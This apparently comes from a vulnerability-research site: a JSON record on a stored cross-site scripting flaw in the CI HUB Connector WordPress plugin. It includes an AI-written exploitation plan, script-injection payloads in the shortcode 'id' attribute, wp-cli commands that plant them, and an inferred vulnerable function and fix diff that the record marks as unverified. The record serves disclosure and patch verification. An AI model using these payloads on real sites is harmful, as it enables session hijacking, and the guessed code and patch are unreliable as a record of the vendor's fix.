[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fBFeGGT6hsAtDRzr8QDS4Db7r7ComZeNP9iwxsiaTaow":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2026-4353","ci-hub-connector-authenticated-contributor-stored-cross-site-scripting-via-id-shortcode-attribute","CI HUB Connector \u003C= 1.2.106 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'id' Shortcode Attribute","The CI HUB Connector plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'id' attribute of the `cihub_metadata` shortcode in all versions up to, and including, 1.2.106 due to insufficient input sanitization and output escaping. 
This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","ci-hub-connector",null,"\u003C=1.2.106","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-21 19:07:58","2026-04-22 07:45:43",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Ff4b36468-319a-4de3-9112-bd4a3cf7d637?source=api-prod",[],"researched",false,3,"This research plan outlines the steps to verify and exploit a Stored Cross-Site Scripting (XSS) vulnerability in the **CI HUB Connector** plugin (CVE-2026-4353).\n\n### 1. Vulnerability Summary\nThe **CI HUB Connector** plugin (up to version 1.2.106) registers a shortcode named `cihub_metadata`. This shortcode accepts an `id` attribute. When the shortcode is processed, the value of the `id` attribute is rendered in the HTML output without sufficient sanitization (using `sanitize_text_field` or similar) or context-aware output escaping (using `esc_attr` or `esc_html`). \n\nBecause contributors and higher-level users can use shortcodes in post content, an attacker can store a malicious payload in a post. The script executes whenever any user, including an Administrator, views the post.\n\n### 2. Attack Vector Analysis\n*   **Shortcode:** `[cihub_metadata]`\n*   **Vulnerable Attribute:** `id`\n*   **Authentication Level:** Contributor+ (Authenticated)\n*   **Injection Point:** Post or Page content.\n*   **Execution Point:** Frontend or Backend view of the post\u002Fpage where the shortcode is rendered.\n\n### 3. Code Flow (Inferred)\n1.  **Registration:** The plugin likely registers the shortcode in an initialization hook:\n    ```php\n    add_shortcode('cihub_metadata', 'cihub_metadata_shortcode_callback');\n    ```\n2.  
**Processing:** The callback function extracts attributes:\n    ```php\n    function cihub_metadata_shortcode_callback($atts) {\n        $a = shortcode_atts(array('id' => ''), $atts);\n        $id = $a['id']; \u002F\u002F Missing sanitization here\n        \u002F\u002F Sink: The 'id' is placed into an HTML attribute or tag without escaping\n        return '\u003Cdiv id=\"' . $id . '\">...\u003C\u002Fdiv>'; \n    }\n    ```\n3.  **Output:** When a user visits the post, WordPress calls the shortcode handler, and the raw payload is echoed into the page source.\n\n### 4. Nonce Acquisition Strategy\nThis vulnerability does not involve a custom AJAX or REST API endpoint that requires a specific plugin nonce for exploitation. Instead, the \"injection\" occurs through the standard WordPress post-creation mechanism.\n\n*   **For the automated agent:** If creating the post via the UI, the agent will need to navigate to `wp-admin\u002Fpost-new.php`, which involves standard WordPress CSRF protection (nonces). \n*   **Simplification:** The most efficient way for the agent to set up the exploit is using `wp-cli` to create the post as a Contributor, bypassing the need for browser-based nonce handling during the injection phase.\n\n### 5. Exploitation Strategy\nThe goal is to demonstrate that a Contributor user can execute JavaScript in the context of an Administrator.\n\n**Step 1: Create a Contributor User**\nUse `wp-cli` to create a user with the `contributor` role.\n\n**Step 2: Inject the Malicious Shortcode**\nCreate a new post as the contributor containing the XSS payload within the `cihub_metadata` shortcode. \n\n**Payloads to test:**\n1.  **Attribute Breakout (Most likely):** `[cihub_metadata id='x\" onmouseover=\"alert(document.domain)\" style=\"display:block;width:100px;height:100px;background:red;\"']`\n2.  
**Tag Breakout:** `[cihub_metadata id='\">\u003Cscript>alert(window.origin)\u003C\u002Fscript>']`\n\n**Step 3: Trigger the XSS**\nNavigate to the newly created post's URL as an Administrator.\n\n### 6. Test Data Setup\n1.  **Install Plugin:** Ensure `ci-hub-connector` version \u003C= 1.2.106 is active.\n2.  **Create User:**\n    ```bash\n    wp user create attacker attacker@example.com --role=contributor --user_pass=password123\n    ```\n3.  **Create Post:**\n    ```bash\n    wp post create --post_type=post --post_status=publish --post_author=$(wp user get attacker --field=ID) --post_title=\"Service Status\" --post_content='Check out the metadata: [cihub_metadata id=\"\\\">\u003Cscript>confirm(document.cookie)\u003C\u002Fscript>\"]'\n    ```\n\n### 7. Expected Results\n*   When viewing the post frontend, the HTML source should contain the raw `\u003Cscript>` tag or the injected event handler.\n*   The browser should execute the `confirm()` or `alert()` function, displaying the administrator's cookies or domain.\n*   **Source Code Inspection:**\n    ```html\n    \u003C!-- If vulnerable to tag breakout -->\n    \u003Cdiv id=\"\">\u003Cscript>confirm(document.cookie)\u003C\u002Fscript>\">...\u003C\u002Fdiv>\n    ```\n\n### 8. Verification Steps\n1.  **Check HTML Output:**\n    Use the `http_request` tool to fetch the post URL and search for the unescaped payload:\n    ```bash\n    # Get the URL of the last created post\n    POST_URL=$(wp post list --post_type=post --format=ids | head -n 1 | xargs wp post get --field=guid)\n    # Fetch content (as unauthenticated or admin)\n    # Search for \"\u003Cscript>confirm\"\n    ```\n2.  **Verify via Browser:**\n    Use `browser_navigate(POST_URL)` and check for the dialog or console logs.\n\n### 9. 
Alternative Approaches\nIf the `id` attribute is sanitized with `sanitize_title` but still rendered inside an attribute, try a \"style\" injection or a \"javascript:\" protocol if the sink is an `href`.\n\nIf the plugin uses a different attribute name for the ID (e.g., `cid` or `metadata_id`), search the codebase for `add_shortcode` to confirm the exact attribute keys:\n```bash\ngrep -r \"add_shortcode\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fci-hub-connector\u002F\n```\nIf the shortcode requires specific CI HUB settings to be configured before it renders anything, the agent may need to mock those settings using `wp option update`.","The CI HUB Connector plugin for WordPress (up to version 1.2.106) is vulnerable to Stored Cross-Site Scripting via the 'id' attribute of the cihub_metadata shortcode. Due to a lack of input sanitization and output escaping, an authenticated user with Contributor-level permissions or higher can inject arbitrary JavaScript that executes whenever an administrator or other user views the affected post.","\u002F\u002F Inferred from registration hook: add_shortcode('cihub_metadata', 'cihub_metadata_shortcode_callback');\n\nfunction cihub_metadata_shortcode_callback($atts) {\n    $a = shortcode_atts(array('id' => ''), $atts);\n    $id = $a['id']; \u002F\u002F Missing sanitization\n\n    \u002F\u002F The unescaped 'id' is concatenated directly into the HTML output\n    return '\u003Cdiv id=\"' . $id . '\">...\u003C\u002Fdiv>'; \n}","--- a\u002Fci-hub-connector\u002Fci-hub-connector.php\n+++ b\u002Fci-hub-connector\u002Fci-hub-connector.php\n@@ -3,4 +3,4 @@\n     $a = shortcode_atts(array('id' => ''), $atts);\n-    $id = $a['id'];\n-    return '\u003Cdiv id=\"' . $id . '\">...\u003C\u002Fdiv>'; \n+    $id = esc_attr($a['id']);\n+    return '\u003Cdiv id=\"' . $id . '\">...\u003C\u002Fdiv>'; \n }","1. Authenticate to the WordPress site with a user account holding at least Contributor-level permissions.\n2. 
Create a new post or edit an existing one.\n3. Insert the cihub_metadata shortcode using a payload that breaks out of the HTML attribute or injects a tag, for example: [cihub_metadata id='\">\u003Cscript>alert(document.cookie)\u003C\u002Fscript>'].\n4. Publish or save the post.\n5. Navigate to the post URL as an administrator to trigger the script execution within the context of the admin's session.","gemini-3-flash-preview","2026-04-27 13:56:19","2026-04-27 13:56:38",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fci-hub-connector\u002Ftags"]
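Review bot: the `research_fix_diff` hunk should be read as a fix sketch, not as the vendor's patch: the `research_vulnerable_code` it amends is labelled "Inferred from registration hook", `patched_in_version` and `patch_trac_url` are null, `patch_diff_files` is empty and `research_verified` is false, so the file path `ci-hub-connector/ci-hub-connector.php` and the `@@ -3,4 +3,4 @@` line numbers are assumptions rather than a located change. On the substance of the hunk, wrapping the value in `esc_attr()` is the correct escaper for the double-quoted HTML attribute sink `'<div id="' . $id . '">'` and closes the attribute-breakout and tag-breakout payloads listed under "Payloads to test"; a reviewer would additionally ask that the value be constrained to an identifier token on input (WordPress's `sanitize_html_class()` or `sanitize_key()`), since an `id` attribute never legitimately needs quotes, angle brackets or whitespace, and input restriction plus output escaping is the defence-in-depth the `research_plan` itself names under "insufficient input sanitization and output escaping".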